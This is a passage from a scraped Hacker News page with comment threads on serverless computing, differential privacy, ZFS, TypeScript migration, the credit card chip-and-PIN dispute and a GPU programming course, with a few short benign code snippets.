Those concerns don't invalidate the applicability or relevance of serverless though. I think its value as a prototyping tool, or to validate a proof of concept, is huge.

7
kabes 18 hours ago 3 replies      
How did this come to be known as serverless? It just seems to be an extreme case of microservices running on someone else's computer?
8
stephenr 18 hours ago 0 replies      
Why not MTTaaS - Misleading Technology Terms as a Service.
9
Animats 6 hours ago 0 replies      
It's just outsourcing. It "depends on 3rd party applications / services (in the cloud)". It's like Salesforce's "No Software".

A real serverless architecture would be federated, like BitTorrent or Bitcoin.

10
Mister_Snuggles 13 hours ago 1 reply      
The serverless architecture appears to have many servers provided by different people instead of having no servers, as "serverless" leads me to think. Is this just trading wrangling a server farm for wrangling contracts with 3rd party service providers?

Am I missing something?

11
winteriscoming 13 hours ago 0 replies      
As someone previously noted about serverless architecture - https://twitter.com/jf/status/739971456302350336
12
TorKlingberg 17 hours ago 5 replies      
Is Google App Engine an example of serverless? The user does not really think about servers, and the code is mostly written as event handlers. The abstraction is a bit leaky though, and you can tell that there are instances being spun up and down.
13
jtwaleson 17 hours ago 1 reply      
If your PaaS supports scaling down to zero (Heroku free tier, Cloud Foundry somewhere in the future) and resuming on incoming traffic, it's basically a much better version of FaaS. The way you deploy code, the way services are coupled to the app, etc., is much better.
14
i_have_to_speak 15 hours ago 1 reply      
Ah, the PetStore example brings back memories! Wonder how many people remember it?
15
jlward4th 15 hours ago 2 replies      
In regards to Stateless and 12 Factor...

> This has a huge impact on application architecture, albeit not a unique one - the Twelve-Factor App concept has precisely the same restriction.

While 12 Factor does say that processes should be stateless I've never thought it really meant it. Connection Pools and in-memory caches are pretty typical in 12 Factor (or all non-serverless) apps. And for me that is what makes serverless kinda silly. Some global state is actually pretty useful when you can avoid the overhead of initializing things or going over the network.

16
amelius 17 hours ago 1 reply      
The article totally skips (serverless) federated architectures, which are more interesting, in my opinion.
17
krislig 8 hours ago 0 replies      
"1. Often require vendor-specific language, or at least vendor-specific frameworks / extensions to a language"

...

"(1) is definitely not a concern for the FaaS implementations Ive seen so far, so we can scrub that one off the list right away."

That point does not make any sense to me. You have to follow the AWS Lambda programming model, which is specific to AWS Lambda, so either way you are tied to some libraries and patterns which are vendor-specific.

18
ecthiender 8 hours ago 0 replies      
I think the word serverless makes more sense in p2p/decentralized architectures, than in platforms using pre-built servers.
19
Touche 16 hours ago 1 reply      
With this type of architecture, aren't you creating latency by separating out the "backend" from the database? In the traditional approach the backend server and database are in the same datacenter, but it seems that's often not the case in FaaS approach, what are the ramifications of that?
20
joefkelley 11 hours ago 1 reply      
The one thing I haven't seen discussed in the serverless world is state as optimization.

For instance, if I have a machine learning application that has to access a very large trained model, I would like to load that model into memory at application startup. Loading from disk at every "function call" would be too slow. So would making RPC calls to some external "model cache" service.

Does AWS Lambda / similar have some sort of overridable "init"?
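
For what it's worth, Lambda containers are commonly reused between invocations, so module-scope code effectively acts as an init: anything cached in a module-level variable survives warm calls. A minimal Python sketch of that pattern (the model load here is a made-up stand-in, not a real API):

  import time

  _model = None  # survives across invocations while the container stays warm

  def _load_model():
      time.sleep(5)  # stand-in for an expensive model deserialization
      return {"weights": [0.1, 0.2]}

  def handler(event, context):  # Lambda's Python handler signature
      global _model
      if _model is None:        # only pay the load cost on a cold start
          _model = _load_model()
      return {"score": sum(_model["weights"])}

There's no guarantee about how long a container lives, so this works as an optimization, not as a home for correctness-critical state.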

21
agentgt 14 hours ago 0 replies      
We sort of do this for a JVM with the exception that it is the JVM and you really can't be rebooting it all the time.

What we do is use a message queue and extreme thread isolation. Our internal framework is sort of analogous to an actor framework and/or Hystrix, but is stateless throughout. Messages are basically functions that need to be run.

That being said because our whole architecture is message driven and uses a queue with many client implementations we have been experimenting with OCaml Mirage and even some Rust + lightweight container because of the serious limitation of booting up the JVM.

22
zippy786 13 hours ago 1 reply      
http://martinfowler.com/articles/serverless/sps.svg

Is there something wrong with the client browser connecting directly to the database? Won't a JS -> MySQL direct connection expose credentials?

23
k__ 9 hours ago 1 reply      
How does this work with WebSockets?

Like, a bit more than FaaS, but less than PaaS?

24
findjashua 11 hours ago 0 replies      
s/serverless/zero-ops/g
25
Aaronik 4 hours ago 0 replies      
#content { margin: auto;}

y/w :D :D

26
dreamdu5t 3 hours ago 0 replies      
Serverless now means "servers in the cloud" ? So what do we call apps that don't use servers!? I'm actually writing one right now...
27
api 10 hours ago 1 reply      
Trouble is most of these are completely single vendor and closed. If you build your app for Lambda, theoretically you've built it to run on one computer: the AWS lambda "main frame."
28
qaq 14 hours ago 0 replies      
shared hosting reinvented :) Name is way cooler though
29
known 14 hours ago 0 replies      
Torrent?
19
What is Differential Privacy? cryptographyengineering.com
343 points by sohkamyung  3 days ago   95 comments top 10
1
ianmiers 2 days ago 1 reply      
This is something Apple really needs to release all the details of. Even if they got the crypto exactly right, they could have picked a privacy budget/ security parameters that just leaks everything.

And there is every reason to be skeptical about Apple's ability to design even mildly complex crypto given iMessage's flaws. Although the break in iMessage wasn't practically exploitable, that was down to luck and the fact that the only way to detect whether a mauled ciphertext decrypted was via attachment messages. The cryptographic mistakes were bad. Given any way to detect decryption of mauled ciphertexts for standard messages (e.g. sequence numbers, timing, actively synching messages between devices, delivery receipts from iMessage instead of APSD), Apple's crypto design bugs would have eliminated nearly all of the E2E security of iMessage.

Remember, this isn't a boon for user privacy. Apple is now collecting far more invasive data about users under the claim that they have protections in place. At best it preserves the status quo and does so only if Apple both picked the parameters correctly and implemented it correctly.

At this point Apple's position is best summed up as: we have drastically reduced your privacy, except not, because of magic that we (i.e. Apple) do not fully understand.

2
bo1024 2 days ago 2 replies      
I've read a couple articles and haven't seen any details about how they're going to apply DP (differential privacy).

It's important to clearly distinguish what DP can and cannot do. DP is just a technique for taking a database and outputting some statistic or fact about it. The output has some noise added to it.

The guarantee of DP is (roughly) that anyone looking at the output alone won't learn much about anyone in the database. This also holds for anything you do with that statistic.

Think about this carefully when thinking about what DP does and doesn't promise. Also think about the difference between "privacy" and "security".

Example of what DP does protect against: If Apple is recommending products to people based on others' download habits, and this recommendation is based on differentially private statistics, then no other user or group of users can infer anything about my downloads. In fact, even engineers at Apple, if they can only see the statistics and not the original database, cannot infer anything about my downloads.

Example of what DP does not protect against: government accessing the data. The database still has to exist on Apple's servers. The government can get to it just as easily as before via warrants or so on. DP is not cryptography.

My assessment: On one hand it is awesome that Apple is taking a lead in using differential privacy and thinking about mathematical approaches to privacy. On the other, there are many facets of privacy and right now I think people are more concerned about security of their data and privacy from the government, or else privacy from companies like Apple itself. DP doesn't address these; it only addresses the case where Apple has a bunch of data and wants the algorithms it runs not to leak much info about that data to the world at large.

3
cromwellian 2 days ago 0 replies      
Some dissenting views on the utility of differential privacy: https://medium.com/@Practical/differential-privacy-considere...

Also, Apple is woefully low on details, theoretical privacy should be accompanied by openly published research papers that are peer reviewed. I understand they won't release the source, but would you trust Apple if they said they invented a new encryption algorithm, but refuse to publish an academic paper on it? I'd be interested precisely in what they're doing. Are they claiming they're doing federated learning, by gathering anonymous image data from photos, uploading it to their cloud, training DNNs on it, and then shipping the results back down to clients for local recognition? Surely they're not training on device, as this is very RAM and CPU intensive.

4
guelo 2 days ago 4 replies      
Apple backed themselves into a corner by marketing themselves as the super-privacy company in contrast to Google. The problem is that all the data collection lets you do some really useful stuff that benefits the user. So now they're spreading FUD while trying to pretend that they're not collecting the same type of data that Google does. Google has been using differential privacy for a while in different projects.
5
ekianjo 2 days ago 2 replies      
> On the other hand, when the budget was reduced to a level that achieved meaningful privacy, the "noise-ridden" model had a tendency to kill its "patients".

Uh, the graph is just showing you get an increased 25% estimated risk of mortality from Warfarin, nothing close to "killing patients". Complete exaggeration, since the mortality baseline is probably very low in the first place.

6
EGreg 2 days ago 0 replies      
If you collect values of a random variable Y from phones, where Y = X + N (N being normally distributed with mean 0 and Var(N) = Var(X), say), then many statistics can be calculated with that.

The law of large numbers says that after gathering statistics from many values of Y, they will converge (for continuously differentiable functions of X) to the values for X.

Yes?

Meanwhile each individual user will not send so many samples as to identify the true values of X with any useful accuracy.
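
A quick numeric sketch of exactly this idea (illustrative only; the values and the noise scale are made up): each individual report is very noisy, yet the aggregate mean converges.

  import random

  # Private per-user values x_i (made up for illustration)
  true_values = [random.uniform(0, 10) for _ in range(100000)]

  sigma = 5.0  # noise scale chosen large for per-user deniability
  reports = [x + random.gauss(0, sigma) for x in true_values]  # y_i = x_i + n_i

  true_mean = sum(true_values) / len(true_values)
  est_mean = sum(reports) / len(reports)
  print(true_mean, est_mean)  # very close, despite each y_i being noisy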

7
hfsbtnye 2 days ago 5 replies      
I have to admit, I'm really starting to like the direction that Apple is heading despite being previously disenchanted. I only wish that they would go ahead and put everything under a free software license, since they're in the business of selling hardware that's coincidentally bundled with their software.
8
nxzero 2 days ago 0 replies      
There seems to be a huge amount of speculative commentary, which is acknowledged, but to me it doesn't show the potential variation in how DP might be implemented.

For example, Apple could easily download all the data, do a DP analysis of the impact of adding the data to the existing aggregate data, clean out identifiers, and add it to the database.

Key here is that Apple has all the data and then purges the identifiers from it, which is completely different than removing the identifiers before sending to Apple.
_______

(Apple:) "Hi, I'm Apple, Trust Me! Don't mind the black bag, I just likely being mysterious, it's cool, right?"

(Me:) "Umm, no, no thanks!"_________

Apple needs to let go of the whole security through secrecy ploy, since it looks more and more shady.

Imagine if security modules for devices where public and non-secure section of the devices had to be encapsulated for EmSec and tamper proof. If this was the case, security literally wouldn't be an issue; either everyone is impacted, or no is impacted.

9
chmike 2 days ago 0 replies      
Does it mean that Apple will randomly insert turds in my messages so that it looks like the average user?
10
kordless 2 days ago 0 replies      
It's time for an Open Communications initiative. Time for companies to stop owning the platform. Time for all of us to stand up for our right to communicate with who we want, when we want, without being monitored, inspected, blamed, or advertised to. Enough is enough. It's time for a change.
20
ZFS: Apple's New Filesystem That Wasn't dtrace.org
295 points by swills  2 days ago   127 comments top 10
1
tracker1 2 days ago 9 replies      
It's kind of a shame that ZFS hasn't seen better adoption, that btrfs has been pretty stagnant, and that next-generation file systems in general are mostly stillborn. It would be nice to see some improvements in this area as 10 TB HDDs are imminent and data management is important.

However, it's worth noting that RAID, especially in software on systems without ECC RAM, is less than ideal. Beyond this is the overhead of managing larger filesystems with ZFS. The DIY raid servers that support it have had some troublesome issues that I've experienced first hand.

It's likely a lot of these advantages have been displaced by the discontinuation of Apple's server projects as well as other fears. On a similar note, I've always been somewhat surprised that NTFS hasn't been more popular for external media, as it's a pretty good fit there.

In the end, software at this level has been held back significantly by the patent hornets' nest that exists in the world today. I truly hope that we can see some reform in this space, but with the likes of TPP and similar treaty negotiations around the world today, that is pretty unlikely. Eventually some countries will have to strike out, break these bad treaties, and rein in IP law. The vast majority of software is undeserving of patent protection, just as software really shouldn't have copyright that lasts for decades. It's a shame all around.

2
rdtsc 2 days ago 1 reply      
In general, is it just me or has ZFS become more popular lately? Saw Ubuntu get behind it, even in light of Btrfs being available for many years now. https://github.com/zfsonlinux/zfs/commits/master is pretty active...

It seems everyone at some point expected Btrfs to shoot ahead and leave other file systems in the dust, so there was no point in bothering with ZFS: "just wait a bit and Btrfs will be the default everywhere". And besides, ZFS has all the legal issues attached to it.

But it seems Btrfs progress was rather slow, so even in spite of the legal issues, interest in ZFS is still growing.

3
jhugg 2 days ago 2 replies      
Seems like running on SSD/NVRAM may call for some new thinking. Running on watches may be even secondary to that.

Not that ZFS won't run well on SSD, but it feels like there's a gulf between filesystems designed with SSDs in mind and those designed with spindles in mind.

4
raattgift 2 days ago 1 reply      
Meanwhile, this works, is under active development, and is essentially at HEAD of both openzfs and zfsonlinux:

https://openzfsonosx.org/

5
cbsmith 2 days ago 2 replies      
People forget that Microsoft has perennially had their Cairo/Object/Whatever FileSystem in development.
6
gribbly 2 days ago 2 replies      
So, according to this article, Apple was making a deal with Sun to use ZFS, and later finally dropped it after an alleged discussion between Steve Jobs and Larry Ellison when Oracle owned it.

My question is why did Apple think they needed to make a deal to use ZFS in the first place, and if so, has Canonical (who says they'll ship openZFS with Ubuntu) made a deal with Oracle?

It's true that OpenZFS is more than Oracle's ZFS, but unless I'm mistaken, the vast majority of code in that project is still owned by Oracle.

This article makes me uneasy.

7
snarfy 1 day ago 0 replies      
Maybe I'm being irrational, but I would never touch ZFS because Oracle.
8
falcolas 2 days ago 3 replies      
> this is the moral equivalent of using newspaper as insulation: it's fine until the completely anticipated calamity destroys everything you hold dear.

How... unnecessarily inflammatory. Hardlinked backups work remarkably well, and are incredibly simple to implement and understand. Of course they can be corrupted, but then again, so can every other form of backup in existence (that said, there are no protections built-in to a hardlinked backup).

9
beedogs 1 day ago 0 replies      
It's a real shame, because HFS is an absolute abomination. Apple will remain without a reliable, full-featured filesystem for another decade, it seems.
10
williesleg 2 days ago 2 replies      
ZFS is fantastic until you try to grow a volume. Emphasis on fantastic.
21
The DAO is currently being attacked, over 2M Ethereum missing so far etherscan.io
375 points by droffel  20 hours ago   1 comment top
1
sctb 13 hours ago 0 replies      
22
Migrating a 10,000-line legacy JavaScript codebase to TypeScript pgbovine.net
289 points by zjiekai  1 day ago   88 comments top 11
1
ghh 22 hours ago 2 replies      
This is kind of a random Typescript tip, but when migrating regular Javascript, there is an alternative to adding the type 'any' to every object to 'silence' the compiler.

That is to introduce a preliminary type definition. Instead of:

  const oldVar: any = { field: 1, ... }
  function foo(bar: any) { ... }
You can write:

  declare type OldVarType = any
  const oldVar: OldVarType = { field: 1, ... }
  function foo(bar: OldVarType) { ... }
This way, you can signal that it's not just any kind of any, but a particular kind of any, which is now trackable in your codebase.

When you're ready, you can gradually update the OldVarType declaration and solve the compiler type check warnings from there. Union types [1] can be quite useful then too.

[1] https://www.typescriptlang.org/docs/handbook/advanced-types....

2
kevan 22 hours ago 3 replies      
I'm about halfway through migrating a ~30kloc ES5 codebase to ES6 with a transpiler (Babel), linter (ESLint), and fast test suite (Mocha) [1]. Once all files are going through the transpiler I'll probably add TypeScript or Flow. We already had RequireJS in place, so the conversion from AMD to ES6 module format has been pretty straightforward, but I'm continually amazed that with every file I convert I usually find a couple of real bugs with the linter. The most common have been:

* Undefined variables referenced in a seldom-traveled conditional branch.

* Leaked globals due to missing `var` keyword.

Every bug I find is immediate feedback that this is a worthwhile use of our time.

[1] https://medium.com/@kevanahlquist/evolution-of-javascript-at...

3
rkwz 22 hours ago 5 replies      
I'm curious how using TypeScript makes the project more "structured" compared to using plain JS.

Typescript just gives you static types and classes. I can understand "classes" make the code more modular and thereby more structured, but can't you already do that using ES5 "class"? Types help in catching errors early and can help in documenting the interface of the methods etc.

Also, if the other problem was isolating the scope of modules and dependency injection, it could be easily done using Requirejs and all the modules could be concatenated during build time. Webpack is a cool tool, but given the nature of its documentation, the maintenance would be really costly in the long run. Requirejs is just more established and satisfies all the author's requirements.

It would've been really helpful if the author had included additional reasoning behind the choices made.

4
Dolores12 22 hours ago 1 reply      
TLDR: rename files to .ts, download type definitions for external libraries, silence TypeScript compiler warnings using 'any'
5
nudpiedo 22 hours ago 5 replies      
By using Haxe he could have started transpiling some of those 10k lines to the Python backend as well, essentially for free, plus getting all the additional preprocessor and type checks that are common to TypeScript and Haxe.

I don't really understand why people jump to TypeScript and not Haxe, which in my opinion has more strategic advantages and guarantees (with very few exceptions).

Is it perhaps just a marketing topic?

6
AnkhMorporkian 22 hours ago 4 replies      
I've always wondered if you could create a runtime inferrer of types for these sorts of projects. As in, attach something that observes function calls, sees over the course of some amount of time what types are passed into them, and makes a best guess of which arguments are what types. While of course it couldn't be perfect, it could save a lot of grunt work.

I made a quick version of this idea in Python 3.4, where it was much easier since I could modify the AST on import, but I never quite got it where I wanted it and sort of lost passion.
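
A minimal decorator version of the idea (my own sketch; an AST-rewriting version like the parent describes would attach this automatically on import):

  import functools
  from collections import defaultdict

  observed = defaultdict(set)  # (function, argument) -> set of seen type names

  def infer_types(func):
      @functools.wraps(func)
      def wrapper(*args, **kwargs):
          # Positional parameter names live in the code object
          names = func.__code__.co_varnames[:func.__code__.co_argcount]
          for name, value in list(zip(names, args)) + list(kwargs.items()):
              observed[(func.__name__, name)].add(type(value).__name__)
          return func(*args, **kwargs)
      return wrapper

  @infer_types
  def add(a, b):
      return a + b

  add(1, 2); add("x", "y")
  print(dict(observed))  # e.g. {('add', 'a'): {'int', 'str'}, ('add', 'b'): {'int', 'str'}}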

7
alphaomegacode 6 hours ago 0 replies      
Lots of intelligent replies here (like much of HN); having a Java & C/C++ background, I picked up Javascript some yrs ago for web work.

Now, I don't know how (or whether) to move to TypeScript or ES6. Any resources/books/videos you all highly recommend? (I built some corporate stuff in Angular 1, but I guess I'll have to move to TS for Angular 2, or learn React?)

Many commenters in this thread seem experienced in TS so thanks in advance for sharing any advice

8
mark_l_watson 15 hours ago 1 reply      
Nice article, and I am going to give webpack a try. I took an edX class in TypeScript a year ago and really like the language, but decided modern JavaScript was getting "good enough." I regret that decision sometimes because TypeScript really is better IMHO.
9
balls187 10 hours ago 0 replies      
> Since globals defined in different JavaScript files share a common namespace, I often found it convenient to reference globals...I knew all along that these were bad habits

This line resonated with me. In my first CS course (Intro to programming), I learned about why using globals can be problematic.

A good reminder that engineering is all about trade-offs. Sacrifice future maintainability for present day productivity.

10
mizzao 11 hours ago 1 reply      
I feel that academic code is generally more prone to bad-smell pressure than industry code, since people generally produce for papers and deadlines and "just get it working for now." It's good to see that it's possible to produce some semblance of order in the constant grind.
11
partycoder 22 hours ago 0 replies      
A machine is faster and more reliable than a human at comparing. Matching types for verification is one of those things.
23
Statistics for Hackers [video] youtube.com
330 points by david90  2 days ago   23 comments top 6
1
harveywi 2 days ago 1 reply      
Similar in spirit to John Rauser's 2014 Strata Conference + Hadoop World keynote "Statistics Without the Agonizing Pain" (https://youtu.be/5Dnw46eC-0o).
2
minimaxir 2 days ago 0 replies      
Previous discussion based on an earlier 2015 version of the slide deck: https://news.ycombinator.com/item?id=10244950

Back then, I wrote a small tutorial on how to implement and animate the bootstrap technique in R/ggplot2 based on the talk: http://minimaxir.com/2015/09/bootstrap-resample/
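
The core resampling loop from the talk is tiny in any language; a rough Python sketch with made-up data:

  import random

  # Made-up sample; estimate a confidence interval for its mean
  data = [48, 24, 51, 12, 21, 41, 25, 23, 32, 61, 19, 24, 29, 21, 23, 13, 32, 18, 42, 18]

  means = []
  for _ in range(10000):
      resample = [random.choice(data) for _ in data]  # draw with replacement
      means.append(sum(resample) / len(resample))

  means.sort()
  print(means[249], means[9749])  # ~95% bootstrap confidence interval for the mean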

3
benbenolson 2 days ago 0 replies      
I actually watched the majority of this, it's a very interesting talk. I'd imagine that all of us are going to need to use at least some statistics one day, so I consider it time well spent.
4
kensai 2 days ago 1 reply      
Really nice. Is there a similar video in R?
5
hayksaakian 2 days ago 4 replies      
I wish there was a way to 'force mono' on YouTube so I could get the same audio from both sides of my headphones.

Sounds like a really interesting talk, but it's painful to listen to with only one ear.

6
voiceclonr 2 days ago 0 replies      
Nice one!
24
Home Depot Files Antitrust Lawsuit Against Visa, MasterCard wsj.com
275 points by ikeboy  13 hours ago   412 comments top 25
1
kylecordes 12 hours ago 27 replies      
It seems to me that these alternatives (Chip & sign, chip and pin, carrying a credit card at all) all compete poorly with the "tap my phone to pay" offerings. I use the latter whenever and wherever it is offered. As I understand it offers greater security than any of the above, and more importantly (life is short) it is much faster. (Though there is one wrinkle. Most point-of-sale systems process phone payments with just the tap. A few of them seem to instead treat it as equivalent to a swipe, and then launch you into a legacy multistep handshake thereafter.)

For reasons I don't understand, the credit card makers have spent many years bringing the new chip cards to market, they include much higher technology than ever offered before, yet the payment process takes much longer. Of course these few seconds don't matter that much per transaction, but think it might be enough to actually make a meaningful difference in staffing levels and line lengths at big stores in December.

I do understand the fees though. The credit card brands and banks have worked themselves, through years of diligent effort, into a business where they can impose a kind of "tax" of 3% on most of the retail economy across the entire US. This is obviously of immense economic value to them, and they will work very hard at every level to maintain it for as long as possible. On the other hand, paying these companies a 3% tax on every retail transaction is... rather surprising in the grand scheme of things, and seems unlikely to persist for that much longer.

2
Adutude 10 hours ago 9 replies      
It would be nice if Hacker News did not accept links to paywalled sites
3
elthran 12 hours ago 8 replies      
Are there any Americans here who are able to explain why the US is so backwards when compared to European countries?

Visa and Mastercard and the banks all offer Chip and Pin services here in the UK, and have done for years.

I can understand the delay in adopting chip cards, with the ridiculously large number of terminals and cards that would have to be replaced - but I really don't see why when you're performing the migration to cards with a chip, you wouldn't implement PIN at the same time

4
teilo 12 hours ago 0 replies      
The good news is that upgrading all these terminals to chip will make chip-and-pin a simple matter of a software update.

I don't know if it was a matter of profit so much as fear of customer alienation. First they get customers used to using the chips. Then they can make them use pins later.

The biggest hurdle will be past once all the chip terminals actually work. It's crazy how many vendors were forced to install these things before the processors were even able to process chip transactions. Most small vendors in this area of the country still are not able to accept chip cards despite having the newer hardware. Thus they are now liable for fraudulent transactions on swiped cards because their processors cannot get their sh*t together.

But once that debacle is resolved, chip and pin should follow as a matter of course.

Frankly, I too wish they had just ripped the bandaid off. After having spent a couple weeks in europe, it is idiotic how many restaurants in non-tourist towns have to scramble to find the one terminal that can print a signature slip for their American guests.

5
uptown 12 hours ago 1 reply      
I tried to pay with ApplePay at The Home Depot but their readers wouldn't allow it. If your company is seriously concerned about fraud, maybe allow customers to use available systems that help prevent it.
6
ccvannorman 10 hours ago 3 replies      
I wish that the shopping experience was

1) I go to a store and pick up what I need
2) I walk out of the store with everything and take it home
3) Store knows what I took (RFID tags)
4) Store knows who I am (cameras, gait analysis, face, whatever, fingerprint at the door, phone swipe, credit card swipe, be creative)
5) I receive an e-bill when the vendor identifies me
6) I set up an auto-pay on my e-bill

Honestly, tap-to-pay doesn't seem like any difference at all vs cash or credit to me. Show me something where I don't even need to interact on exiting the store!

7
vermontdevil 10 hours ago 2 replies      
A typical process using a chip card:

1) Swipe card (out of habit)

2) Machine says use chip card reader.

3) Insert card in reader.

4) Machine freezes.

5) Get support - reset machine quickly.

6) Plan to swipe but luckily remembered. Inserts in slot.

7) Wait for what feels like hours to get it going.

8) Enter code

9) Approved! Takes card out.

Blah. I am sure in a few years things will get better though. Or maybe just go with Apple Pay (or something of that type).

8
dean 12 hours ago 1 reply      
In Canada, Walmart is suing Visa for 'unacceptably high' fees. http://www.cbc.ca/news/business/walmart-canada-visa-1.363095...
9
ikeboy 13 hours ago 0 replies      
https://archive.is/wmqqR has it without paywall
10
iamleppert 11 hours ago 3 replies      
At this point, what is stopping some other company from coming in and giving all the merchants a square-like payment terminal that doesn't use the credit card networks?

I honestly think this is something that needs to be done as a public works project, or a non-profit.

11
coryfklein 5 hours ago 1 reply      
Digital currencies enable me to send $10 across the globe for less than a penny and Visa charges $0.30 - I have a hard time imagining a future where the system allows for such a large inefficient gap to remain for long.

Not saying that current digital currencies (bitcoin, etc) will replace Visa. Just that they show that this problem doesn't cost 3% of the transaction to solve.

12
cmurf 12 hours ago 1 reply      
What happened to RFID/contactless? All of my cards had RFID, and then when they were replaced got chipped. No RFID. I called all of the issuers and they said chip only, no RFID option available. It's almost like they want us to use our phones instead of the card itself?

And why are chip transactions so much slower than either swipe or contactless transactions? It really is something of a regression.

13
jdeibele 9 hours ago 1 reply      
I received a debit card from my relatively small credit union a few days ago. I was very surprised to see that it didn't have a chip in it.

It seems likely that the fees they earn from "signature transactions" must be significant enough that they don't want anyone using it as a chip card.

An alternative answer is that the cost of the cards themselves is so much that they don't want to do it. When I lost my wallet, a different credit union charged me $10 for a replacement card. And neither had a chip. The other banks did it for free.

14
crb002 9 hours ago 0 replies      
Every chip reader in Des Moines uses the same reader hardware, and every software install on them is radically different. Somebody is making bank writing the glitchy touch screen apps.
15
frandroid 8 hours ago 0 replies      
This seems like part of the global retailer war against credit card companies, such as seen here in Canada: https://www.thestar.com/news/canada/2016/06/11/walmart-canad...
16
17
willhamina 7 hours ago 0 replies      
I've gone to cash wherever possible. I needn't monitor my CC accounts so closely, reconcile them at the end of the month, nor worry about stolen cards. Sellers love cash.

Best of all I spend far less - I am more parsimonious if I pay with cash.

18
ArkyBeagle 9 hours ago 0 replies      
This seems similar to WalMart's recent decision to stop taking some credit cards in Canada.

https://news.ycombinator.com/item?id=11887469

19
callmeed 9 hours ago 0 replies      
Where I am in California only about 1/3 of merchants are accepting chip cards (even though I believe the deadline was October of last year).
20
tosseraccount 10 hours ago 0 replies      
American Express sued Visa and Mastercard in 2004: http://www.nbcnews.com/id/6494456/ns/business-us_business/t/...

They settled in 2007 : http://www.nytimes.com/2008/06/26/business/26credit.html

Mastercard paid $1.8 billion, Visa paid $2.1 billion

MA and V have way outperformed AXP since.

21
pigpaws 13 hours ago 1 reply      
article NOT behind a paywall: http://boston.cbslocal.com/2016/06/15/home-depot-visa-master...

TL;DR: chip-and-signature cards are not as secure as chip-and-PIN cards. Also, CC processing is expensive.

22
unabst 10 hours ago 0 replies      
tl;dr Fuck these cards. Go team Depot. Walmart is suing too. [0]

As someone with one foot in retail, I can honestly say these cards are not doing anyone any favors. Fraud is rampant and there are shoppers that travel the world [0.5] with stolen cards just to spend stolen cards and gift cards [1].

During the transition to chip, Square had liability shift for non-chip cards [2], but we failed to meet the requirements for a few transactions because we insisted on entering the ZIP for security, which requires key entry even at an additional fee. There was no feature to enable ZIP code entry for swipes. In these cases, trying to heighten security with additional measures was the wrong move for us. We should have just let them swipe and Square eat the cost.

Apple has been burying a scandal of its own with Apple Pay fraud. Once after a shopper left, we immediately received negative feedback through Square from someone claiming they didn't just buy anything from our store. Well, when someone has a phone, there is nothing to check. Though Apple Stores seem to have been hit hard, which seems appropriate [3].

The main problems are, 1) as retailers we cannot treat every customer as a crook nor can we profile them [4], 2) if they jump through all the hurdles, we can't then not sell them something even if something seems odd, and 3) in the case of Apple Pay, gift cards, and some swipe transactions, retailers are actually covered so even if buyers appear suspect, there is zero incentive to call them out, 4) the police don't treat it as shoplifting, and 5) some of the worst offenders are not suspicious at all, and can even be contesting their own purchases on purpose.

This is just a fact, but most of the scammers that came through our store were from NY and were black (again, just a fact, not saying anything about race or NY, though something does seem to be going on there [4][5]).

--

[0] http://www.wsj.com/articles/wal-mart-sues-visa-over-chip-ena...

[0.5] http://arstechnica.com/tech-policy/2014/11/authorities-arres...

[1] http://www.tripwire.com/state-of-security/risk-based-securit...

[2] https://squareup.com/news/why-square-sellers-can-rest-easy-a...

[3] http://www.nytimes.com/2015/03/17/business/banks-find-fraud-...

[4] http://www.ag.ny.gov/press-release/ag-schneiderman-announces...

[5] http://nypost.com/2016/04/26/rappers-used-stolen-credit-card...

23
chinathrow 13 hours ago 1 reply      
The whole field is so ripe for disruption, yet nothing ever materialises...
24
logicallee 13 hours ago 3 replies      
If they had a trust, credit card processing fees would be 7%, not 3%. They obviously don't.

-

correction: "If you're looking for quick numbers, here you go: the average credit card processing cost for a retail business where cards are swiped is roughly 1.95% - 2%" source: https://www.cardfellow.com/average-fees-for-credit-card-proc...

why would a trust have rates that low? It seems competitive to me...

25
post_break 13 hours ago 1 reply      
After Home Depot showed it didn't understand security and my credit card was spoofed I've tried to stop shopping there. It's difficult sometimes.
25
CS 179: GPU Programming caltech.edu
327 points by kercker  3 days ago   31 comments top 10
1
ChristianGeek 3 days ago 1 reply      
I'm taking a free course in CUDA programming on Udacity at the moment that's co-taught by a guy from NVIDIA Research and a professor from UC Davis. If you're looking for something that starts from the basics and is really easy to follow, I highly recommend it.

https://www.udacity.com/course/intro-to-parallel-programming...

2
anocendi 3 days ago 2 replies      
It is very cool to see that the class is being taught by a group of juniors/seniors (I checked the top two; the first was a senior and the second a junior), and an appointed faculty member is listed only as a supervisor ....

I am really interested in the class outcome, and would love to hear how the students in the class feel about this arrangement ....

I can see the good things about this. It gives the instructor/TA students an opportunity to grow while giving a peer-learning atmosphere to students in the class. Plus, the students in the class will learn from peers who have the latest working knowledge of CUDA fresh in their heads, and this arrangement also frees up a faculty member (or two) from having to prepare the course so that they can do their faculty/research work (prepping and teaching a class, especially an interesting and engaging one, is a really draining experience on the part of the faculty as well.)

The only downside I can see could be managing the class well enough that class time is efficiently utilized. But I believe this should be covered by the faculty member in the supervisor position ....

3
jhj 2 days ago 0 replies      
For someone that knows a thing about CUDA and parallel programming already, the best reference is Paulius Micikevicius' presentations. If the words in it mean something to you, these 100+ slides explain more about the hardware and programming model than any other documentation you'll find elsewhere.

http://on-demand.gputechconf.com/gtc/2013/presentations/S346...

If you want to really master CUDA, Nvidia GPUs and the various programming model tradeoffs, the best thing is to write a GEMM kernel and a sort kernel from scratch. To take it even further, write two of each: one that optimizes large GEMMs/sorts, and one that optimizes for batches of small GEMMs (or large GEMMs with tiny (<16 or <32) `k` or another dim) / batches of small sorts. Specialization for different problem configurations is often the name of the game.

For GEMM, you can work through the simple GEMM example in the CUDA documentation, then take a look at the Volkov GEMM from 2008, then the MAGMA GEMM, then the Junjie Lai / INRIA GEMM, then eventually the Scott Gray / Nervana SASS implementation, in increasing order of complexity and state-of-the-art-ness.

4
rmonroe 3 days ago 0 replies      
I took this class last year. Although it was nice to see undergraduates instructing the class, the lack of teaching experience really showed: the students were pretty rough around the edges in terms of their examples and explanations. About 2/3rds of classes ended early (at least this is better than heavily wasted time). This somewhat fits in with the unofficial caltech policy of "figuring out the finer details on your own".

That said, I thought the practical nature of the class was a refreshing switch from the heavily theoretical foundation of my other CS coursework experiences.

5
gaius 3 days ago 7 replies      
Why CUDA not OpenCL I wonder?
6
gtani 3 days ago 0 replies      
The lecture slides are very good.

For anybody following along, there's 2 other books, Wrox Professional Cuda programming, and Cuda for Engineers, which would ease entry for those who aren't versed in HPC (PDE solvers, BLAS/LAPACK, Fourier transforms etc). The Storti/Yurtoglu book is the best intro i've seen to the topic, the Wrox book covers a lot of the material in Wilt's Handbook, not as exhaustively, but more up to date (Kepler vs Fermi).

________________________

There's other course material online: UIUC, Oxford (especially good, IMO)

